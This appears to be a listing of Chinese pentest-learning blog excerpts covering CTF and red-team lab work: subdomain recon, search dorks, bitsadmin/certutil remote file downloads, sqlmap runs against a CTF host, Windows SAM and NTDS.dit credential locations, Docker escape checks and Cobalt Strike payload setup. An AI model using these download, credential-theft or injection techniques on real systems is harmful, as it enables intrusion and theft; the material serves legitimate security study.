mindmap 信息收集域名子域名收集工具oneforallpython oneforall.py –target ip/域名 runhack语法常用的语法 站点： site inurl 可以用于web 目录 intext 在正文中查询 intitle 在标题中查找 filetype 过滤文件类型 pdf,word,xls,ppt,image,jepg 网络空间搜索

文件下载windwosrundll32.exe 加载hta文件cscript.exe 加载vbs文件 bitsadmins缺点只能下载真正的http服务优点windwos自带的指令bitsadmin /transfer task_name http://ip:port/file filepathcertutil缺点需要进行两个操作，首先是下载，然后是清楚缓存指令下载:certuti

web文章管理系统这个是一个sql注入 0x00 使用的知识点 sql 注入 0x01 出现id 0x02 爆破数据库 1python sqlmap.py -u http://challenge.qsnctf.com:32112?id=1 --dbs 发现ctftraining 1python sqlmap.py -u http://challenge.qsnctf.com:321

简介本文件用于记录每天刷题 2024-02-28 [NSSRound#8 Basic]MyDoor https://www.nssctf.cn/problem/3483 [MoeCTF 2021]babyRCE https://www.nssctf.cn/problem/3409 2024-02-29 青少年ctf比赛 青少年CTF - AU9U5T (tsy244.github.i

简介开始时间： 2024-02-28 结束时间：  2024-03-02 总结时间 2024-03-02 环境搭建网络设置 发现需要两个内网网段和一个外网网段 通过nat 网卡模拟外网 web1 ubuntu 密码 web : web2021 web2 ubuntu 密码 ubuntu : ubuntu pc1 win7 密码 bunny：Bunny2021

常规问题记录 windows 密码保存的位置 对于单个主机来说 c:\windows\system32\config\SAM 对于域环境来说的话 c:\windwos\NTDS\NTDS.dit powershell Powershell渗透框架 - AU9U5T (tsy244.github.io) 几率很大的两个问题 powershell 默认执行策略 Restricted

简介开启时间: 2024-02-23 17:24 环境搭建靶机下载地址: 漏洞详情 基本就是win7 双网卡，模拟出网，进网 记得修改网络的配置，记得改成自动 密码win7sun\heart 123.comwin7内域用户登录Administratordc123.com 进入系统密码123.com 2008sun\admin 2020.com进入系统密码：2020.com 细节搭建win7

简介刚好做到红日4里需要进行docker 逃逸，发现不会学习一下 判断是否存在于 检查根目录 检查根目录是否存在.dockerenv 如果有则说明存在于docker 里面 检查**/proc/1/cgroup** 检查这个文件夹里是否存在与docker 相关的字段 1cat /proc/1/cgroup Docker Remote API未授权访问逃逸简介

简介开始时间 2024-2-19 15:23 完成时间 2024-2-21 17:25 环境搭建下载靶场下载地址：http://39.98.79.56/vuln/detail/6/ 共有三台主机DC、WEB、WIN7 密码主机密码 WEB主机 ubuntu:ubuntu WIN7主机 douser:Dotest123 (DC)WIN2008主机 administrator:Test2008

cs 上线linux创建监听器 使用C2 创建监听器 pyload在对应的client 下面生成的payload 模拟上线